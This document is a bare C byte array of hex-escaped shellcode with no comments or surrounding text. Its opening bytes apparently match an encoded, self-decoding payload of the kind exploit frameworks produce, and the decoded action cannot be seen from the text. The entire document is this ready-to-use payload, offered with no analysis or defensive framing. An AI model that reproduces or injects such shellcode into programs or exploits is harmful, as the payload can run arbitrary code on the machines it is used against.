unsigned char buf[] = 
"\xda\xd5\xb8\xac\xd5\x70\xfa\xd9\x74\x24\xf4\x5f\x33\xc9"
"\xb1\x3d\x83\xc7\x04\x31\x47\x16\x03\x47\x16\xe2\x59\x0c"
"\x99\x41\xec\xa3\x03\x03\x37\xcf\x97\x9f\x9d\x19\x11\xee"
"\x16\xd9\x4b\xed\x69\x87\x98\x0d\x9e\x28\x24\x51\xbd\xc4"
"\x2e\x58\xac\x9e\x90\xc9\x6b\xf2\x86\x8a\x05\x6f\x3b\xdf"
"\x12\xdf\xba\xa7\x49\x13\xb4\x16\x42\xb5\x9f\xcf\xf9\x27"
"\xa2\x78\xba\x1f\xa5\x75\x47\xae\x23\x87\x01\x6b\x22\x1e"
"\x18\xb8\xbf\xcd\xc3\xf4\x32\xb6\x50\x97\x12\x77\x53\x5d"
"\xbc\x16\x3c\x2f\x46\xc6\x7f\x11\xd4\xea\x99\xd1\x9e\x9a"
"\xfb\xf1\x5b\x1a\x9f\x63\x09\xac\xfc\x07\x72\xfa\x93\x6a"
"\x40\x5d\xa8\x9a\xdd\x18\x7e\x15\x2a\x7a\x77\x14\x30\xca"
"\xf9\x99\x9c\x1a\x2a\x49\x36\x35\x95\x78\x72\xc0\xbd\xd1"
"\xd1\x80\x64\x98\x71\x60\x75\xdd\x6b\xac\xcf\x4d\xc8\x24"
"\x7e\x4d\x80\xb6\xe4\x82\xbe\xcf\x30\xc2\xf1\xb6\x77\x4a"
"\xba\x8e\xed\xda\x2b\x37\xf7\xbb\x1b\xf8\x2e\xf1\xaa\x3a"
"\x12\x76\xf3\x17\xd5\xb3\xe8\x09\x39\xa8\x3d\x60\x20\x74"
"\x72\xdb\xf1\x39\x3c\xd6\xaa\x7a\xbf\x0f\x6b\x1c\x7e\x27"
"\xc9\xc4\x9f\xb0\x84\x2c\x8a\x55\x59\x62\xb7\x58\x90\x01"
"\x64\x8f\xde\x46\xd9\xe3\xcc\xd9\x7a\xc3\x50\xa3\xbf\xc1"
"\x34\x5f\xfc\xda";
